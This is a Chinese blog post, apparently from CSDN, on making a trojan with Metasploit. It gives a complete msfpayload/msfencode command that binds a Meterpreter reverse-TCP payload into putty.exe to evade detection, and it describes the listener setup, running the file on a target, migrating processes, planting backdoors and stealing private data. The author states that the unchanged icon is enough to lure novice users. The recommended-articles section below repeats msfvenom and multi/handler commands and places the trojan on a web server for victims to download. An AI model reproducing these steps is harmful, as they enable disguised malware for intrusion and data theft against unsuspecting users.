木马程序的制作

最新推荐文章于 2025-04-29 13:40:10 发布
原创 最新推荐文章于 2025-04-29 13:40:10 发布 · 3.4w 阅读 · 92 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#木马 #渗透测试 #网络安全

0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作.

实验环境:Win7SP1+Backtrack5.

使用工具有:msfpayload+msfencode.

 

0x01使用msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.30.101  LPORT=443 R | msfencode -e x86/shikata_ga_nai  -c  5  -t  exe  -x  /root/Desktop/putty.exe  -o /root/Desktop/putty_backdoor.exe

1-1.

命令解释:

Msfpayload后面是一个具有回连功能攻击载荷.

LHOST设置为自己的IPLPORT设置为自己的端口,用于回连.

RRaw)是输出为二进制格式,|代表管道,将二进制数据通过管道给msfencode进行编码.

e选择编码的模块,c表示编码的次数,这里是5.

t表示生成的格式,这里为exe.

x表示选择的源文件,o是输出加入PAYLOAD并进行过编码的木马文件.

 

0x02:生成的木马文件如图1-2.

 

1-2.

0x03:进入MSF后,我们打开监听模块.

 

1-3.

选择好PAYLOAD后设置目标回连的IP和端口即可.

 

1-4.

0x04:把木马文件复制到目标机器上并执行.

 

1-5.

0x05:查看监听状态,会发现有一个Meterpreter回连会话,这是你就可以使用migrate迁移进程,然后安装后门程序,再窃取隐私信息...

 

1-6.

 

End:这次渗透测试还是很简单的,蛋疼的是看《Metasploit渗透测试魔鬼训练营》的木马程序制作时一直不成功,研究了几天后偶然在国外的技术文章中收获了点灵感————不使用-K参数,虽然生成的木马程序不能拥有源程序的完整功能,但图标和程序大小没有改变,足够诱惑小白用户了,虽然msfencode2015年就宣布停止了,但我还是想把这块硬骨头啃烂,如果各位同道能找到解决方法,请联系我,谢谢!

 

1-7报错问题.

  

You can find me by qq:1762458611

木马编程-手把手带你进入木马的世界之木马编程
该用户很懒,没有写简介。。。
07-28 1万+
一、基础知识 1.1、木马病毒 木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。 木马会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的办法。只要把Form的Visible属性设为False,ShowInTaskBar设为False,程序运行时
网络安全--kali制作--手机kali--手机木马程序
2202_75858632的博客
01-16 1543
注意:这里演示的是安卓手机被植入木马程序,对方会拿木马来干嘛,该文章禁止传播,禁止去做非法用途,如果触犯法律一切后果自己承担。环境描述:攻击机--kali--Linux--IP:192.168.6.132电脑端夜神模拟器攻击机--手机安卓(Android)--IP:192.168.1.3实验安卓手机(Android)--IP:192.168.1.5我用电脑做的,用手机的Termux也可以,不会的去哔哩哔哩看看怎么用怎么安装查看主机IP然后制作木马这就显示制作好了因为是安卓的所以是apk我用的夜神模拟器我把制
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
分享Python知识
10-02 2863
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
木马编写小技巧
热门推荐
尹成的技术博客
12-31 2万+
 1.锁定鼠标:这个功能很简单只要一个ClipCursor()就可以搞定了看看下面的小程序#include #include int main(int argc, char* argv[]){ printf("/n别害怕15妙后你的鼠标就可以使用了^_^/n"); RECT rect; rect.bottom=1; rect.right=1;  ClipCursor(&rect); ::Sleep
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2961
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
怎么做一个木马
wuli1024的博客
01-27 3928
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
Python编写简易木马程序
记录,总结,成长
01-28 9585
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
简单木马的编写
weixin_44540487的博客
08-09 2228
MINI木马的编写 编写一个服务端,服务端开启远程后门 客户端使用telnet命令来操控该木马 先进行服务段的编写 WSADATA wsaData; SOCKET ServiceSocket,ClientSocket; SOCKADDR_IN SockAddr; int SockAddrSize; WSAStartup(MAKEWORD(2, 2), &wsaData); SockAddr.sin_family = AF_INET; SockAddr.sin_addr.S_un.S_add
python结合邮件制作木马程序
2301_79455688的博客
08-19 2022
以上代码就是木马程序的核心,可以继续添加功能,但万不可做违法的事,下一期是一个炫酷的病毒控制端。
android木马制作方法,实现木马病毒的详细步骤
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木马病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木马病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木马病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一...
远程控制与木马程序设计.doc
最新发布
05-01
木马程序设计则是制作出一种恶意软件,它以远程控制为核心功能,通过植入目标计算机,控制其执行特定操作。在本实验中,我们将深入探讨远程控制与木马程序设计的一般原理和技术细节。 首先,远程控制的基础是网络...
metasploit制作木马程序
Chaos
11-15 2326
第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:   1)百度搜索,下载原版putty程序   2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty
木马病毒制作及分析
qq_45785457的博客
11-04 2万+
实验目的 本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容: (1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击; (2) 利用网络安全工具或设备对入侵与攻击进行检测; 【注意事项】 1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。 2.若在个人电脑上实验,最好在虚拟机中运行。 3.测试完毕后,请注意病毒程序的清除,以免误操作破坏
一个简单木马程序的编写
编程开发资料库
08-31 1622
一个简单木马例子 写文章一般都赋源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样 才比较实际,关于那些函数用法和功能大可以去翻书,哪里讲的比谁都详细. 这里给了一个用异步SOCKET方式, 直接调用WINSOCK API,WIN SDK写的木马(VC,C++ BUILDER下均编译,调试通过),无须客户端,编译后才几十K.实现了些 主要功能,文件浏览,上传,下载(均支持统配符),改...
简单木马制作
qq_66656628的博客
03-07 647
展示简单木马制作过程,对我们防范木马具有启示
木马如何生成--简易木马制作,从零基础到精通,收藏这篇就够了!
leah126的博客
04-29 917
真不是标题党,这回咱不聊虚头巴脑的学习路线,直接上干货——手把手教你撸一个简易木马。别误会,毕竟,天天用加载器生成木马,却不知道背后原理,跟盲人摸象有啥区别?虽然脚本能绕过360,但终究是治标不治本。
metasploit木马制作
01-04
### 使用Metasploit框架创建木马 #### 创建并配置监听器 为了成功利用Metasploit创建木马,首先需要设置一个有效的监听器来接收来自目标系统的连接。这可以通过`msfconsole`完成,在其中可以加载特定的exploit模块以及对应的payload。 ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <本地IP地址> set LPORT <端口号> exploit -j -z ``` 上述命令序列用于初始化一个多平台处理程序,并设定针对Windows操作系统的反向TCP Meterpreter shell作为有效负载[^1]。 #### 生成木马文件 接着,通过`msfvenom`工具可方便地构建适用于不同场景下的恶意软件样本。对于希望影响Windows主机的情况而言: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<端口> -f exe > evilshell.exe ``` 此指令指定了要采用的payload类型为`windows/meterpreter/reverse_tcp`,同时设定了回连的目标服务器信息(即攻击者的机器),最后将输出格式化成`.exe`文件保存下来[^3]。 #### 部署木马至Web服务目录 一旦获得了编译好的执行体之后,则需将其放置在一个能够被潜在受害者访问的位置上;通常情况下会选择HTTP(S)协议共享路径实现这一点。例如,把之前制作出来的`evilshell.exe`上传到Apache HTTP Server默认根目录下以便后续分发给对方下载运行: ```bash cp evilshell.exe /var/www/html/ ``` 该行脚本展示了怎样把生成的木马副本迁移到Linux系统内预置web站点的内容区里去等待传播时刻的到来[^2]。
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值